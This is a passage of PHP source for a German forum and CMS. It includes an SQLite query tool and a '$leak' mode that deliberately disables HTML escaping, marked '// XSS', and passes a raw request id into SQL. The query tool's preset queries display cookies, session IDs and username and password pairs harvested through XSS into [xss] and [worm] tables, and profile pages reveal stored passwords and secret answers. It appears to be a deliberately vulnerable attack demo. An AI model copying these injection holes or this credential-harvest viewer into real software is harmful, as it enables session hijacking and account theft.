document.cookie = 'hide=' + ((x = document.cookie.match(/(^|\W)hide=(\w+)/)) ? (x[2] & 65535-(1<<1)) + (1<<1) * 1 : 1<<1) + '; path=$self';
return false;
"),array('&' => '&', "'" => '"'))."'>»</a></td></tr></table>
<a href='http://www.wikicreole.org/wiki/PressReleaseGerman'$tgb><b>Forumschreibweise:</b></a></td></tr>".implode('',$val)
.(($img) ? "<tr><td colspan='2'>".@preg_replace(array_keys($creole),array_values($creole),
"**Smilie-Codes:**\n<table width='100%' cellpadding='0' cellspacing='0' id='smile'><tr><td valign='bottom'><small>
:D @@~:-D ~;-D ~:D ~;D@@
8) @@~8-) ~B-) ~8) ~B)@@
8O @@~8-O ~8-o ~8O ~8o@@</small></td><td valign='bottom'><small> :) @@~:-) ~:)@@
;) @@~;-) ~;)@@
8| @@~8-| ~8|@@</small></td><td valign='bottom'><small> ~~ @@~~-~~ ~~@@</small></td></tr><tr><td valign='top'><small> :( @@~:-( ~;-( ~:( ~;(@@
:| @@~:-| ~;-| ~:| ~;|@@
:? @@~:-? ~;-? ~:? ~;?@@</small></td><td valign='top' colspan='2'><small> :C @@~:-C ~;-C ~:-c ~;-c ~:C ~;C ~:c ~;c@@
:O @@~:-O ~;-O ~:-o ~;-o ~:o ~;o ~:O ~;O@@
:x @@~:-x ~;-x ~:-X ~;-X ~:x ~;x ~:X ~;X@@</small></td></tr><tr><td colspan='3' valign='top'><small> :P @@~:-P ~;-P ~:-p ~;-p ~:-b ~;-b ~:P ~;P ~:p ~;p ~:b ~;b@@</small></td></tr></table>")."</td></tr>" : "")."</table><script type='text/javascript'><!--\n".preg_replace($js,'',"
document.getElementById('cra').style.display = 'block';
if(window.innerWidth && window.innerWidth < 1000 || ((x = document.cookie.match(/(^|\W)hide=(\w+)/)) && x[2]&(1<<1)))
document.getElementById('crh').style.display = 'none',
document.getElementById('crs').style.display = 'block';".(($img) ? "
var a,s = document.getElementById('smile').getElementsByTagName('img');
for(a = 0; a < s.length; a++)
s[a].setAttribute('onclick','setsmile(\" ' + s[a].alt + '\")');
function setsmile(s) {
if((a = document.getElementsByTagName('body')[0].getElementsByTagName('textarea'))) {
if(document.selection)
document.selection.createRange().text = s;
else
if(a[0].selectionStart || a[0].selectionStart == '0')
a[0].value = a[0].value.substring(0,a[0].selectionStart) + s + a[0].value.substring(a[0].selectionEnd,a[0].value.length);
else
a[0].value += s;
a[0].focus();
}
}" : ""))."//--></script>$out";
}
# Creole Demo
if($request == 'Creole')
if($leak or $uid) {
$creolevar['type'] = 'cms';
if(isset($_POST['source']))
$out .= "<fieldset class='cr'><legend><b><a href='#edit'>Creole Ansicht:</a></b></legend>".@preg_replace(array_keys($creole),array_values($creole),strtr(($var = $_POST['source']),array_slice($html,1)))."</fieldset><br />";
else
$var = '';
$out .= "<a name='edit'></a><form action='$self/$request' method='post'><fieldset><legend><b>Creole Livedemo</b> <small><a href='#edit'>(edit)</a></small></legend>
<small>Quelltext:</small><br /><textarea style='width:100%' name='source' cols='80' rows='$taz'>".strtr($var,$html)."</textarea><br />
<input type='submit' name='test' value='Anzeigen' /> <input type='reset' value='Zurücksetzen' /> <input type='submit' name='stop' value='Abbrechen' />"
.((($leak or $status/2%2) and isset($_COOKIE['debug']) and $_COOKIE['debug']) ? " <input type='checkbox' name='nodemo' id='nodemo' ".((isset($_REQUEST['nodemo'])) ? " checked" : "")."> <label for='nodemo'><small>Keine Legende erstellen</small></label>" : "")."</fieldset></form><script type='text/javascript'><!--
document.forms[0].source.focus();//--></script>";
}
else
$request = 'Impressum';
# Source
if(preg_match('/^source(?:\.(txt|html|php\.gz))?$/i',$request,$val)) {
if($sql and $q and preg_match('/\d+/',$q,$var) and $line = $sql['aq']($conn,"
select strftime('%d.%m.%Y %H:%M:%S',f.[create]) as datum,
userid,
mailid,
username,
title,
message
from [forum] as f
left join [user] as u on f.userid = u.id
where f.id=$var[0]".(($status/2%2) ? '' : " and f.status".(($status%4 == 0) ? "%2 = 0" : " is not null")."
and (f.mailid is null or f.mailid = ifnull('$uid',null) or f.mailid is not null and f.userid = ifnull('$uid',null) or f.mailid = f.userid)"),SQLITE_ASSOC))
$out .= "<fieldset><legend><a href='$self".(($line[0]['mailid']) ? "/Mail" : "")."?q=$var[0]'>".((is_null($line[0]['title'])) ? "<em>Ohne Titel</em>"
: "<b>".strtr($line[0]['title'],array_slice($html,1))."</b>")."</a> von "
.((is_null($line[0]['username'])) ? "Unbekannt" : "<a href='$self/Profil?id=".$line[0]['userid']."'>".$line[0]['username']."</a>")
." vom ".$line[0]['datum']."</legend><pre style='white-space:pre-wrap'>".strtr($line[0]['message'],array_slice($html,1))."</pre></fieldset>";
else {
$val[] = '';
$lines = file(__file__);
if(isset($_GET['download']) or $val[1] == 'php.gz') {
header("Content-Type: application/octet-stream");
header('Content-Disposition: filename="'.basename(__FILE__).'.gz"');
die($gz['encode'](implode('',$lines),9));
}
elseif(strtolower($request) == $request and $val[1] != 'html' or $val[1] == 'txt') {
header('Content-Type: text/plain; charset=8859-1');
die(implode('',$lines));
}
else {
foreach($lines as $key => $var)
while(false !== $tab = strpos($lines[$key],"\t"))
$lines[$key] = substr($lines[$key],0,$tab).str_repeat(' ',8-$tab%8).substr($lines[$key],$tab+1);
$out .= "<pre style='white-space:pre-wrap'>".strtr(highlight_string(implode('',$lines),true),array(' ' => ' ', "\r" => '', "\n" => ''))."</pre>";
}
}
}
if($sql) {
# SQLite-Terminal mit Option auf vorgegegebenen Querys der XSS-Attacken
if(($leak and $query or $info[3] != '' or $status/2%2) and $request == 'SQL') {
$val = '';
$q = false;
if($leak) {
$set = (preg_match('/\w+/',$query,$var)) ? $var[0] : ((isset($_POST['preset'])) ? $_POST['preset'] : '');
if($set == "worm")
$q = "
select *
from [worm]
order by id desc
limit 0,25";
elseif(preg_match('/(cookie|account)/',$set))
$q = "
select x.id as ID,
i.hits as Hits,
strftime('%d.%m.%Y %H:%M:%S',[create]) as 'Datum/Zeit',
href as Url,".(($set == 'account') ? "
user as Username,
pass as Password," : "
sess as Session,
data as Cookie,")."
useragent as UserAgent
from [xss] as x
inner join ( select max(id) as id,
count(*) as hits
from [xss]".(($set == 'account') ? "\n\twhere user is not null and pass is not null" : "")."
group by ".(($set == 'cookie') ? "sess,data" : "user,pass")."
) as i on i.id = x.id
order by x.id desc
limit 0,25";
$array = array(
'account' => 'Accountdaten',
'cookie' => 'Cookies und Sessions',
'worm' => 'Daten vom Wurm',
'sqlite' => 'SQLite Mastertabelle');
foreach($array as $key => $var)
$array[$key] = "<option value='$key' ".(($query == $key or isset($_POST['preset']) and $_POST['preset'] == $key) ? " selected" : "").">$var</option>";
$val = "<select name='preset' size='1' onChange='this.form.submit()'><option value=''>Preset-Querys:</option>".implode("",$array)."</select>";
}
if($status/2%2 or $info[3] != '') {
if($leak and $set == 'sqlite')
$q = "select * from $sql[m]";
$array = $sql['sq']($conn,"select name from $sql[m] where type = 'table'");
foreach($array as $key => $var)
$array[$key] = "<option value='$var'".((isset($_POST['table']) and isset($_POST['query']) and $_POST['table'] == $var and $_POST['query'] == '') ? " selected" : '').">$var (".$sql['sq']($conn,"select count(*) from [$var]").")</option>";
$val = "<select name='table' size='1' onChange='".preg_replace($js,'',"
if(this.form.query.value == \"\")
this.form.submit();
else {
this.form.query.value += \"[\" + this.value + \"]\";
this.value = \"\";
this.form.query.focus();
}")."'><option value=''>Tabellen:</option>".implode("",$array)."</select> $val";
if(!$q and isset($_POST['query']) and $_POST['query'] != "")
$q = $_POST['query'];
else
if(isset($_FILES['file']) and !$_FILES['file']['error'] and file_exists($_FILES['file']['tmp_name']))
$q = implode('',$gz['file']($_FILES['file']['tmp_name']));
if(!$q and isset($_POST['table']) and $_POST['table'] != '')
$q = "select * from [".preg_replace('/\W/','',$_POST['table'])."]";
$out = "$info[8]<form name='sql' action='$self/SQL' method='post' enctype='multipart/form-data'><fieldset><legend><b>SQLite-Query-Tool (<a href='$self/Backup' title='Backup'>$base</a>)</b></legend>
<small>Datenbankabfrage</small><br /><textarea name='query' rows='16' cols='80' style='width:100%' onChange='this.form.preset.value=\"\"'>".strtr($q,$html)."</textarea><br />
<input type='submit' value='Ausführen' title='Mit Ergebnistabelle' />
<input type='submit' name='exec' value='Daten Update' title='Ohne Ergebnistabelle' />
<input type='reset' value='Zurücksetzen' onDblClick='this.form.query.value=\"\";this.form.preset.value=\"\";' title='Eingabe löschen' /> <input type='file' name='file' title='Komprimierten Query hochladen' />$val</fieldset></form><script type='text/javascript'><!--
document.sql.query.focus();//--></script>";
}
if($q)
if($result = (isset($_POST['exec']) and ($status/2%2 or $info[3] != '')) ? @$sql['e']($conn,$q) : @$sql['q']($conn,$q)) {
if((!is_object($result) and $var = $sql['c']($conn)) or is_object($result) and !$sql['nf']($result) or (is_bool($result) or !$sql['nf']($result)))
$out .= "<p>Es wurden ".preg_replace('/^0$/','keine',$var)." Einträge geändert!</p>";
else {
$line = '';
for($a=0;$a<$sql['nf']($result);$a++)
$line .= "<td><b>".strtr($sql['fn']($result,$a),$html)."</b></td>";
$line = array("<tr>$line</tr>");
while($row = $sql['fa']($result,SQLITE_NUM)) {
$var = '';
for($a=0;$a<count($row);$a++)
$var .= "<td>".((is_null($row[$a])) ? "<font color='gray' ><i>NULL</i></font>" : (($row[$a] === '') ? " " : preg_replace('/[\r\n]+/','<br />',trim(strtr($row[$a],$html)))))."</td>";
$line[] = "<tr>$var</tr>";
}
if(count($line) > 1)
$out .= "<p>Es befinden sich ".number_format(count($line)-1,0,'','.')." Einträge in der Tabelle!</p><table border='1'>".implode('',$line)."</table><br />";
}
}
else
if(@$sql['le']($conn) != 0)
$out .= "<p><b>Abfrage fehlgeschlagen</b>: ".@$sql['ers'](@$sql['le']($conn))."</p>";
$out .= "<address>SQLite ".$sql['lv']()." ".php_uname()." (PHP ".phpversion()."/".php_sapi_name().") - Charset: ".$sql['lc']()."</address><!---->";
}
# Forum Formular
if($request == 'Beitrag' and ($uid or $gast) and $rw) {
if(!$id and isset($_POST['id']) and preg_match('/^\d+$/',$_POST['id'],$var))
$id = $var[0];
if($id and ($var = $sql['aq']($conn,"
select f.id as id,
strftime('%s',f.[create]) as 'create',
strftime('%d.%m.%Y %H:%M:%S',f.[create]) as crdatum,
strftime('%s',f.change) as change,
strftime('%d.%m.%Y %H:%M:%S',f.change) as chdatum,
f.changes as changes,
f.title as title,
f.message as message,
f.status,
ifnull(f.status%2,'-1') as right,
u.status,
u.username as username,
f.userid as userid,
f.mailid as mailid
from [forum] as f
left join user as u on f.userid = u.id and f.status".(($status%4 == 0) ? "%2 = 0" : " is not null")." and u.status is not null
where f.id = $id and (f.mailid is null or f.mailid = nullif('$uid',''))
limit 1"))) {
$var = reset($var);
$creolevar = array_merge($creolevar,array('type' => 'forum', 'id' => $var['id'], 'name' => $var['id'], 'title' => $var['title'], 'create' => $var['create'], 'right' => $var['right'], 'from' => $var['username']));
if(!isset($_POST['message']))
$out .= "<fieldset class='cr'><legend>(<a href='#edit'>$var[id]</a>) "
.((is_null($var['title'])) ? "<i>Ohne Titel</i>" : "<b>".preg_replace(array_keys($smile),array_values($smile),strtr($var['title'],array_slice($html,1)))."</b>")
." <small>(Erstellt: $var[crdatum]".(($var['create'] != $var['change']) ? " / <span title='Änderungen: $var[changes]'>Geändert: $var[chdatum]</span>" : '')
.(($var['userid'] != $var['mailid']) ? " von ".((is_null($var['username'])) ? "Unbekannt" : "<a href='$self/Profil?id=$var[userid]'>$var[username]</a>") : '')
.")</small></legend>".@preg_replace(array_keys($creole),array_values($creole),strtr($var['message'],array_slice($html,1)))."</fieldset><br />";
}
else
$var = array('id' => '');
$val = preg_replace($phtml[0],$phtml[1],((isset($_POST['title'])) ? $_POST['title'] : ((isset($var['title'])) ? $var['title'] : "")));
$line = preg_replace($phtml[0],$phtml[1],((isset($_POST['message'])) ? $_POST['message'] : ((count($var) > 1 and $var['mailid'] === $var['userid']) ? $var['message'] : '')));
if(isset($_REQUEST['mail']))
$wrt = $_REQUEST['mail'];
elseif(isset($var['mailid']))
$wrt = $var['mailid'];
else
$wrt = false;
if(isset($_POST['message']))
$out .= "<fieldset class='cr'><legend><b><a href='#edit'>Vorschau:</a></b> "
.((isset($_POST['title']) and $_POST['title'] == '') ? "<i>Ohne Titel</i>" : "<b>".preg_replace(array_keys($smile),array_values($smile),$val)."</b>")
." <small>(".$sql['sq']($conn,"select tagline from user where id = $uid")
.")</small></legend>".@preg_replace(array_keys($creole),array_values($creole),strtr($_POST['message'],$html))."</fieldset><br />";
$usr = $sql['aq']($conn,"
select u.id as id,
u.username as username
from [user] as u
left join [user] as s on u.id = s.id and s.id ".(($uid) ? "= $uid" : "is null")."
where u.status is not null
order by s.id desc,u.username");
foreach($usr as $k => $v)
$usr[$k] = "<option value='$v[id]'".((isset($var['mailid']) and !is_null($var['mailid']) and $var['userid'] == $v['id'] or isset($_REQUEST['mail']) and $_REQUEST['mail'] == $v['id'] or isset($_REQUEST['blog']) and $v['id'] == $uid) ? " selected": "").((isset($var['userid']) and $v['id'] == $var['userid']) ? " style='font-weight:bold'" : "").">".(($uid == $v['id']) ? "Blog von" : "Mail an").": $v[username]</option>";
$k = (isset($_REQUEST['mail']) and preg_match('/\d+/',$_REQUEST['mail'],$v) and $k = $sql['aq']($conn,"select username,tagline from [user] where id=$v[0]")) ? array($k[0]['username'],(($leak or is_null($k[0]['tagline'])) ? $k[0]['tagline'] : strtr($k[0]['tagline'],array_slice($html,1)))) : false;
$out .= "<a name='edit'></a><form action='$self/$request".(($var['id'] != '') ? "?q=$var[id]" : "")."' method='post'><fieldset><legend><b>Neuen Beitrag ".(($k) ? "an $k[0] " : "")."verfassen</b>"
.(($k and !is_null($k[1])) ? " (<small id='tl'>$k[1]</small>)" : "")." <small>(<a href='#edit'>edit</a>)</small></legend>
<small>Titel:</small><br /><input type='text' name='title' value='$val' style='width:100%' /><br />
<small>Nachricht:</small><br /><textarea style='width:100%' name='message' cols='80' rows='$taz'>$line</textarea><br /><input type='hidden' name='id' value='$var[id]' />
<input type='hidden' name='max' value='".$sql['sq']($conn,'select max(id) from [forum]')."' />
<input type='hidden' name='mode' value='".(($wrt == $uid) ? 'Blog' : (($wrt) ? 'Mail' : ''))."' />
<input type='submit' name='test' value='Vorschau' /> <input type='submit' name='save' value='Speichern' /> <input type='reset' value='Zurücksetzen' /> <input type='submit' name='stop' value='Abbrechen' /> <select name='mail' size='1'><option value=''>Beitrag ins Forum</option>".implode("",$usr)."</select>"
.(($status%2) ? " <select name='right' size='1'><option value='0'>Für alle Sichtbar</option><option value='1'".((isset($_POST['right']) and $_POST['right'] == 1 or isset($_REQUEST['mail']) and $_REQUEST['mail'] and $_REQUEST['mail'] != $uid or isset($var['f.status']) and $var['f.status']%2 == 1) ? " selected" : "").">Nur für Benutzer</option></select>" : "")
."</fieldset></form><script type='text/javascript'><!--
document.forms[0].".(($val) ? "message" : "title").".focus();//--></script>";
}
# Benutzerprofil anzeigen
if(preg_match('/(Profil|Bearbeiten)/',$request)) {
$var = ($mid) ? $mid : (($id) ? $id : $uid);
if((!$lone or $user or $uid) and $var) {
if($usr = $sql['aq']($conn,"
select (select count(*)
from [forum]
where userid = $var and mailid is null and status".(($status%4 == 0) ? "%2 = 0" : " is not null").")
||','|| (select count(*)
from [forum]
where userid = $var and mailid is not null and status is not null)
||','|| (select count(*)
from [forum]
where userid = $var and mailid is not null and status is not null and status/2%2 = 0)
||','|| (select count(*)
from [forum]
where mailid = $var and userid != $var and status is not null)
||','|| (select count(*)
from [forum]
where mailid = $var and userid != $var and status is not null and status/2%2 = 0)
||','|| (select count(*)
from [forum]
where mailid = userid and userid = $var and status".(($status%4 == 0) ? "%2 = 0" : " is not null").")
||','|| (select count(*)
from [file]
where user=$var and status ".(($status%4 == 0) ? '' : '<')."= 1)
||','|| (select sum(abs(size))
from [file]
where user=$var and status is not null) as count,
*
from [user] as u
where ".(($status/2%2) ? "" : "status is not null and ")."id=".((isset($_GET['id']) and $_GET['id']) ? (($leak) ? $_GET['id'] : preg_replace('/\D/','',$_GET['id'])) : (($var) ? $var: $uid)))) {
$usr = reset($usr);
if(isset($usr['id']))
@$creolevar = array_merge($creolevar,array('type' => 'profil', 'id' => $usr['id'], 'name' => $usr['username'], 'from' => $usr['username'], 'title' => $usr['tagline'], 'create' => strtotime($usr['create']), 'change' => strtotime($usr['change']), 'right' => ((is_null($usr['status'])) ? -1 : ($usr['status']/2%2))));
$v = "<td valign='top'>";
$k = substr($v,0,-1)." nowrap>";
if(isset($usr['passhelp']) and preg_match('/^(\d+)-(?:(.+):)?(.+)$/',$usr['passhelp'],$val) and isset($pass[$val[1]]))
$usr['passhelp'] = array((($val[2] != '') ? $val[2] : $pass[$val[1]]),$val[3]);
if(substr_count($usr[0],",") < 6)
$usr[0] .= ",0,0,0,0,0,0,0";
$val = explode(',',$usr[0]); // count,mailout,newout,mailin,newin,blog,upload,bytes
if(($uid == $var or $status/2%2) and isset($usr['id']) and $usr['id']) {
$out .= "<div align='right'>".@preg_replace(array_keys($creole),array_values($creole),"--"
.preg_replace(array('/^.*\[ |~/s','/ \].*$/s'),array('',' | '),$info[4])."[[^"
.((isset($_GET['id'])) ? "Daten".(($status/2%2 and $uid != $usr['id']) ? "?id=$var" : '')."|Daten bearbeiten" : "Profil?id=$var|Meine Daten anzeigen")
."]] | [[^Bearbeiten".(($status/2%2 and $uid != $usr['id']) ? "?id=$var" : '').((count($_POST) == 0)? "#edit" : "")."|Profil bearbeiten]]--")."</div>";
if(isset($_GET['id'])) {
if($status/2%2 and $uid != $var) {
$head['atom'] = "<link rel='alternate' title='Atomfeed von $usr[username]' type='application/atom+xml' href='$self/Atom?id=$var.".$hash[0]($sql['sq']($conn,"select username||':'||password from [user] where id=$var"))."' />";
$uedit = "Daten?id=$var";
}
else
$uedit = "Daten";
$out .= "<fieldset><legend><b>".(($uid == $var) ? "Ihre gespeicherten Daten" : "Die gespeicherten Daten von <b>$usr[username]</b>")."</b></legend><table>
<tr>$k<b>Benutzer-ID:</b></td>$k".number_format($usr['id'],0,'','.')."</td>
$k<b>Benutzername:</b></td>$v$usr[username]</td></tr>
<tr>$k<b>Logins:</b></td>$k".number_format($usr['logins'],0,'','.')."</td>
$k<b>Kennwort:</b></td>$v".(($usr['password'] == '') ? "<em>Nicht angegeben!</em>" : "<script type='text/javascript' language='javascript'>document.write(\"<a href='#' onClick='alert(unescape(\\\"".implode('',preg_replace('/(\w\w)/','%$0',unpack('H*',$usr['password'])))."\\\"))'>".((preg_match('/^salt:\w+-hash:\w+$/',$usr['password'])) ? "Verschlüsselt!" : "Anzeigen")."<\/a>\");</script><noscript><font size='1'><em>Bitte JavaScript aktivieren!</em></font></noscript>")."</td></tr>
<tr>$k<b>Zugriffe:</b></td>$k".number_format($usr['requests'],0,'','.')."</td>
$k<b>Vorname:</b></td>$v$usr[forename]</td></tr>
<tr>$k<b>Änderungen:</b></td>$k".number_format($usr['changes'],0,'','.')."</td>
$k<b>Nachname:</b></td>$v$usr[lastname]</td></tr>
<tr>$k<b>Forumbeiträge:</b></td>$k".number_format(intval($val[0]),0,'','.')."</td>
$k<b>eMail:</b></td>$v<a href='mailto:$usr[mail]'>$usr[mail]</a></td></tr>
<tr>$k<b>Blog:</b></td>$k".number_format($val[5],0,'','.')."</td>
$k<b>Homepage:</b></td>$v".(($usr['page'] == '') ? "<em>Nicht angegeben!</em>" : "<a href='".preg_replace('/^(?!https?:\/\/)/','http://',$usr['page'])."'$tgb>$usr[page]</a>")."</td></tr>
<tr>$k<b>Mailverkehr:</b></td>$k".(($val[4]) ? "<span title='Eingang (Neu)'>".number_format($val[4],0,'','.')."</span> / " : "")."<span title='Eingang (Alle)'>".number_format($val[3],0,'','.')."</span> | ".(($val[2]) ? "<span title='Ausgang (Neu)'>".number_format($val[2],0,'','.')."</span> / " : "")."<span title='Ausgang (Alle)'>".number_format($val[1],0,'','.')."</span></td>
$k<b>Wohnort:</b></td>$v".(($usr['town'] == '') ? "<em>Nicht angegeben!</em>" : $usr['town'])."</td></tr>
<tr>$k<b>Chat-Texte:</b></td>$k".$sql['sq']($conn,"select count(*) from [chat] where id = $var")."</td>
$k<b>Chat-Status:</b></td>$v".(($usr['chat'] and substr($usr['chat'],0,1) != '-') ? "Im Chat mit: ".((is_array($wrt = $sql['sq']($conn,"
select ifnull(username,'Unbekannt')
from [user]
where id != $uid and id != chat and chat = ".strval($usr['chat'])."
order by username"))) ? implode(', ',$wrt) : $wrt) : (($status/4%2) ? "Frei" : "Aus")).(($status/8%2) ? " <span title='Verschlüsselt'>$lock</span>" : '')."</td></tr>
<tr>$k<b>Dateien:</b></td>$k$val[6]</td>
$k<b>Sicherheitsfrage:</b></td>$v".((is_array($usr['passhelp'])) ? $usr['passhelp'][0] : "<em>Nicht angegeben!</em>")."</td></tr>
<tr>$k<b>Datei-Freiraum:</b></td>$k".number_format($maxfile-$val[7],0,'','.')." Bytes</td>
$k<b>Geheim-Antwort:</b></td>$v".((is_array($usr['passhelp'])) ? "<script type='text/javascript'>document.write(\"<a href='#' onClick='alert(unescape(\\\"".implode('',preg_replace('/(\w\w)/','%$0',unpack('H*',$usr['passhelp'][1])))."\\\"))'>Anzeigen<\/a>\");</script><noscript><font size='1'><em>Bitte JavaScript aktivieren!</em></font></noscript>" : "<em>Nicht angegeben!</em>")."</td></tr>
<tr>$k<b>Status:</b></td>{$v}Log ".(($usr['status']%2) ? 'in' : 'off')."</td>
$k<b>Geburtstag:</b></td>$v".(($usr['born']) ? date('d.m.Y',strtotime($usr['born']))." (".floor((time()-strtotime($usr['born']))/365.2425/24/60/60).")" : "<em>Nicht angegeben!</em>")."</td></tr>
<tr>$k<b>Rechte:</b></td>$k".(($usr['status']/2%2) ? 'Admin' : ((is_null($usr['status'])) ? 'Keine' : 'Benutzer'))."</td>
$k<b>Bildschirm:</b></td>$v".(($usr['info'] == '') ? "<em>Nicht angegeben!</em>" : preg_replace('/(\d+),(\d+),(\d+)/','$1 * $2 / $3',$usr['info']))."</td></tr>
<tr>$k<b>Erstanmeldung:</b></td>$k".date('d.m.Y H:i:s',strtotime($usr['create']))."</td>
$k<b>IP-Adresse:</b></td>$v$usr[ip]</td></tr>
<tr>$k<b>Letzter Besuch:</b></td>$k".((isset($_SESSION['lua']) and $uid == $usr['id']) ? date('d.m.Y H:i:s',strtotime($_SESSION['lua'])) : "<em>Unbekannt</em>")."</td>
$k<b>SessionID:</b></td>$v$usr[session]</td></tr>
<tr>$k<b>Letzte Aktion:</b></td>$k".date('d.m.Y H:i:s',strtotime($usr['change']))."</td>
$k<b>Browser:</b></td>$v$usr[useragent]</td></tr>
</table></fieldset>";
}
}
if(isset($usr['id']) and $usr['id']) {
$v = array("Erstanmeldung: ".date('d.m.Y',strtotime($usr['create'])));
if($val[0])
$v[] = "<a href='$self?id=$usr[id]'>Beiträge: ".number_format($val[0],0,'','.')."</a>";
if(isset($val[5]) and $val[5])
$v[] = "<a href='$self/Blog/$usr[username]'>Blogs: ".number_format($val[5],0,'','.')."</a>";
if(isset($val[6]) and $val[6])
$v[] = "<a href='$self?s=d&id=$usr[id]'>Uploads: ".number_format($val[6],0,'','.')."</a>";
if($uid or $gast)
$v[] = "<a href='$self/Beitrag?mail=$usr[id]'>Mail an $usr[username]</a>";
if($usr['page'])
$v[] = "Homepage: <a href='".preg_replace('/^(?!https?:\/\/)/','http://',$usr['page'])."'$tgb>".preg_replace('!^https?://!','',$usr['page'])."</a>";
if(!$uedit and ($uid == $usr['id'] or $status%2))
$uedit = "Bearbeiten".(($uid != $usr['id']) ? "?id=$usr[id]" : "")."#edit";
}
$out .= "<fieldset class='cr'><legend>Profil von <b>".(($uid and isset($usr['id']) and $usr['id'] and $var != $uid) ? "<a href='$self/Beitrag?mail=$usr[id]' title='Mail an $usr[username]'>$usr[username]</a>"
: $usr['username'])."</b>".((!isset($usr['tagline']) or !$usr['tagline']) ? "" : " (<small id='tl' title='Tagline'>".@preg_replace(array_keys($creole),array_values($creole),
(($leak and isset($_GET['source']) or !$leak) ? strtr($usr['tagline'],$html) : $usr['tagline']))."</small>)").(($request == 'Bearbeiten') ? " <small><a href='#edit'>(edit)</a></small>" : '')
."</legend>"
.(($leak and isset($usr['id']) and $usr['id'] and ($status/2%2 or isset($_COOKIE['debug']) and $_COOKIE['debug']) and preg_match("!<(script)[^>]*>.*</\\1>!i",$usr['profil'])) ? "<a href='$self/Profil/$usr[username]?source'><img align='right' src='$self/img?".(count($img)-2)."' border='0' height='16' style='height:1em' alt='XSS' title='XSS Quelltext' /></a>" : '')
.((count($v) > 1) ? "<div id='kontakt'><small>".implode(' / ',$v)."</small></div><hr />" : "")."<div id='profil'>"
.(($leak and isset($_GET['source'])) ? "<pre style='white-space:pre-wrap'>".strtr($usr['profil'],$html)."</pre>"
: @preg_replace(array_keys($creole),array_values($creole),
strtr(((isset($_POST['profil']) and isset($_POST['test'])) ? $_POST['profil'] : ((is_null($usr['profil'])) ? 'Noch kein Profil hinterlegt!' : $usr['profil'])),(($leak) ? array() : array_slice($html,1)))))."</div></fieldset>"; // XSS
}
else {
$out .= "<h3>Benutzer nicht gefunden!</h3>";
$request = 'Mitglieder';
}
}
else
$request = 'Mitglieder';
}
# Benutzerprofil Formular
if($request == 'Bearbeiten' and $uid and $rw)
$out .= "<br /><a name='edit'></a><form action='$self/$request' method='get'>"
.(($status/2%2 and $uid != $usr['id']) ? "<input type='hidden' name='id' value='$usr[id]'>" : '')
."<fieldset><legend><b>Tagline Bearbeiten</b></legend><table width='100%'><tr><td width='99%'><input type='text' size='80' maxlength='255' style='width:100%' name='tl' value='".strtr($usr['tagline'],$html)."' ondblclick='this.value=\"\"' /></td><td><input type='submit' value='Setzen' /></td></tr></table></fieldset></form>
<form name='profile' action='$self/Bearbeiten".(($status/2%2 and $uid != $usr['id']) ? "?id=$usr[id]" : '')."' method='post'>
<fieldset><legend><b>Profil Bearbeiten</b> <small>(<a href='#edit'>edit</a>)</small></legend><textarea style='width:100%' name='profil' cols='80' rows='15' id='bearbeiten'>".preg_replace($phtml[0],$phtml[1],((isset($_POST['profil'])) ? $_POST['profil'] : $usr['profil']))."</textarea><br />
<input type='hidden' name='uid' value='$usr[id]' /><input type='submit' name='test' value='Vorschau' />
<input type='submit' name='save' value='Speichern' /> <input type='reset' value='Zurücksetzen' />
<input type='submit' name='stop' value='Abbruch' />"
.(($status/2%2 or isset($_COOKIE['debug']) and $_COOKIE['debug']) ? " <input type='button' value='Strip HTML' onClick='document.profile.profil.value=document.profile.profil.value.replace(/(?:^\s+|\s*<(\w+).*?>(.*?<\/\\1>\s*)?|\s+\$)/g,\"\"),document.profile.onsubmit=false' />" : "")
."</fieldset></form>";
# Mitglieder
if($request == 'Mitglieder' and (!$lone or $user or $uid)) {
$data = (($id and $status/2%2) ? "" : "\n\twhere u.status is not null");
$num = $sql['sq']($conn,"select count(*) from [user] as u$data");
if($page[0] == '')
$page = array(1,"page=1");
preg_replace($paging[5],$paging[6],"$num,$max,<a href='$self/Mitglieder?page=#key##max#".(($sort) ? "&sort=$sort" : "")."' title='#var#'>#key#</a>");
if($rows = $sql['aq']($conn,"
select u.username as username,
u.[create],
u.change,
f.count as count,
m.bcount as blogs,
m.count as mails,
d.count as files,
u.status/4%2||','||ifnull(u.chat,'-'),
u.status/2%2,
u.status%2,
u.page as page,
u.forename as fore,
u.lastname as last,
u.ip as ip,
u.id as id,
u.chat as chat,
u.mail as mail,
u.status as status,
u.useragent as agent,
u.tagline as tagline,
p.id as profil,
s.id as script,
strftime('%d.%m.%Y %H:%M',u.[create]) as angemeldet,
strftime('%d.%m.%Y %H:%M',u.change) as aktion,
f.userid as userid,
m.mid as mailid,
m.rcount as rcount,
d.pcount as pcount,
t.tcount as tcount,
c.username as chatuser
from [user] as u
left join ( select userid,
count(*) as count
from [forum]
where status".(($status%4 == 0) ? "%2 = 0" : " is not null")." and mailid is null
group by userid) as f
on f.userid = u.id
left join ( select u.id as mid,
count(f.id)-count(b.id) as count,
count(b.id) as bcount,
count(m.id)-count(r.id) as rcount
from [user] as u
left join [forum] as f on f.userid = u.id or f.mailid = u.id
left join [forum] as r on r.id = f.id and r.mailid = u.id and r.status/2%2 = 1
left join [forum] as m on m.id = f.id and m.mailid = u.id
left join [forum] as b on b.id = f.id and b.mailid = u.id and b.mailid = b.userid and b.status".(($status%4 == 0) ? "%2 = 0" : " is not null")."
where f.status is not null and f.mailid is not null
group by u.id) as m
on m.mid = u.id
left join ( select a.user,
count(*) as count,
count(p.id) as pcount
from [file] as a
left join [file] as p on p.id = a.id and p.status/2%2 = 0
where a.status is not null
group by a.user) as d
on d.user = u.id
left join ( select userid,
count(*) as tcount
from [forum] as t
where path is null and mailid is null and t.status is not null
group by userid) as t
on t.userid = u.id
left join [user] as p on p.id = u.id and p.profil is not null
left join [user] as s on s.id = p.id and s.profil like '%<script%>%</script>%'
left join [user] as c on c.id = u.chat"
.$data.preg_replace($sorth[2],$sorth[3],"u.username;13;u.username")."
limit $val,$max")) {
$row = array();
foreach($rows as $var)
$row[] = "<tr><td".(($leak and $status/2%2 and $var['script']) ? " bgcolor='#ffe0e0'" : "").">"
.(((is_null($var['profil']) or $var['profil'] == '') and !$status/2%2) ? "<span title='Kein Profil hinterlegt'>$var[username]</span>"
: "<a href='$self/Profil/$var[username]' title='Profil anzeigen'>".((is_null($var['profil']) or $var['profil'] == '' or !$status/2%2)
? $var['username'] : "<b>$var[username]</b>")."</a>")."</td><td nowrap>$var[angemeldet]</td><td nowrap>$var[aktion]</td><td align='center'>"
